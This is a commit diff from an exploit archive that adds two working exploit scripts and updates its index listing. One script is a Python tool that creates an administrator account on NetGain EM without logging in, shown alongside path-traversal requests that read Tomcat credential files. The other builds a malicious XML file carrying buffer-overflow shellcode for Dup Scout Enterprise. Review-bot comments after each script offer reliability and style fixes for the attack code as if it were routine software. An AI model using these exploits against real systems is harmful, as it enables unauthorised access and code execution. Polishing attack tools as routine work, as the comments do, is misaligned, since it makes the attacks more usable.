DB: 2017-05-25
2 new exploits Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034) Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
parent
2907a841a7
commit
07c41df34d
3 changed files with 186 additions and 2 deletions
|
@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port
|
|||
18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
|
||||
18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
|
||||
18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
|
||||
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
|
||||
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
|
||||
18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
|
||||
18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
|
||||
18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
|
||||
|
@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
|
|||
28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0
|
||||
28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
|
||||
28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
|
||||
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
|
||||
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0
|
||||
28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
|
||||
28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
|
||||
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
|
||||
|
@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port
|
|||
42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
|
||||
42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
|
||||
42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
|
||||
42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port
|
|||
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
|
||||
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
|
||||
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
|
||||
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
|
||||
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
|
||||
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
|
|
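--- a/platforms/jsp/webapps/42058.py
+++ b/platforms/jsp/webapps/42058.py
@@ -0,0 +1,122 @@
+'''
+# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+
+Add User Account with Admin Privilege without Login
+----------------------------------------------
+We can create user and give admin privilege to user which we have made
+without login.
+Because this app does not check the session on this request
+
+
+Local File Inclusion
+----------------------------------------------
+Normal Request:
+
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+
+filename=iossd.log
+
+We can download another file with change value on filename parameter and
+also we can send this request without login.
+
+Example:
+
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+
+filename=../../tomcat/conf/tomcat-users.xml
+'''
+#!/usr/local/bin/python
+# Exploit Title: Add User Account with Admin Privilege without Login
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+
+import requests
+import sys
+
+try:
+def create():
+ip = str(sys.argv[1])
+port = str(sys.argv[2])
+user = str(sys.argv[3])
+passwd = str(sys.argv[4])
+
+print "\033[1;32m[+]\033[1;m Try to Create user"
+url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
+data= {
+'new': "true",
+'id': "",
+'name': user,
+'dname': "foobar",
+'password': passwd,
+'password2': passwd,
+'description': "",
+'emails': "foo@bar.com",
+'mobileNumber': "000000",
+'loginAttempts': "5",
+}
+response = requests.post(url, data=data)
+status = response.status_code
+if status == 200:
+print "\033[1;32m[+]\033[1;m Success!!"
+role()
+else:
+print "\033[91m[-]\033[91;m Create User Failed"
+
+
+def role():
+ip = str(sys.argv[1])
+port = str(sys.argv[2])
+user = str(sys.argv[3])
+passwd = str(sys.argv[4])
+
+print "\033[1;32m[+]\033[1;m Get admin role"
+url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
+data= {
+'name': "admin",
+'description': "Administrator",
+'users': [user,"admin"],
+}
+response = requests.post(url, data=data)
+status = response.status_code
+if status == 200:
+print "\033[1;32m[+]\033[1;m Success!!"
+print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
+else:
+print "\033[91m[-]\033[91;m Get admin role Failed"
+
+create();
+
+except:
+print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
+print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])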
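Review bot: The bare `except:` that closes the `try` wrapping the whole script catches every failure — a refused connection, a hung request, even KeyboardInterrupt — and reports all of them as a usage error, so a run against an unreachable host looks like a mistyped command line. The only condition that handler is meant to cover is a short `sys.argv`, so narrow it to `except IndexError:` and read the four arguments once at the top of the file instead of repeating the `sys.argv[1]`..`sys.argv[4]` block in both `create()` and `role()`. Both `requests.post(url, data=data)` calls are made without a `timeout`, so either can block indefinitely; add `timeout=10` (or similar) to each. The `status == 200` checks treat any reply as success, which deserves a comment since JSP applications commonly render error pages with status 200 as well; from the defender's side the underlying finding is that `user_save_do.jsp` and `role_save_do.jsp` accept state-changing POSTs with no session check, so the server-side fix is authorization on those endpoints, and the page's indented structure (Python 2 `print` statements under `try:`) has been flattened by the rendering, so the original indentation cannot be confirmed here.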
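--- a/platforms/windows/local/42059.py
+++ b/platforms/windows/local/42059.py
@@ -0,0 +1,60 @@
+author = '''
+
+##############################################
+# Created: ScrR1pTK1dd13 #
+# Name: Greg Priest #
+# Mail: ScR1pTK1dd13.slammer@gmail.com #
+##############################################
+
+# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
+# Date: 2017.05.24
+# Exploit Author: Greg Priest
+# Version: Dup Scout Enterprise v9.7.18
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+
+import os
+import struct
+
+overflow = "A" * 1536
+jmp_esp = "\x94\x21\x1C\x65"
+#651F20E5
+#651F214E
+#652041ED
+nop = "\x90" * 16
+esp = "\x8D\x44\x24\x4A"
+jmp = "\xFF\xE0"
+nop2 = "\x90" * 70
+nSEH = "\x90\x90\xEB\x05"
+SEH = "\x80\x5F\x1C\x90"
+#"\x80\x5F\x1C\x65"
+#6508F78D
+#650E129F
+#651C5F80
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode
+
+evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
+exploit = open('Ev1l.xml', 'w')
+exploit.write(evil)
+exploit.close()
+
+print "Ev1l.xml raedy!"
+
+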
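Review bot: `import os` and `import struct` at the top of the file are both unused — nothing below references either module — so they should be dropped rather than left as dead imports. The output file is opened with `open('Ev1l.xml', 'w')` and closed by hand three lines later; `with open('Ev1l.xml', 'w') as exploit: exploit.write(evil)` releases the handle even if the write raises. The closing message has a typo, `print "Ev1l.xml raedy!"` should read `print "Ev1l.xml ready!"`. The header block is bound to a module-level name `author` that is never read; a plain module docstring (the same text without the `author =` assignment) documents the file just as well, and a one-line comment stating that the script is Python 2 only (it uses the `print` statement) would save a reader a failed run under Python 3.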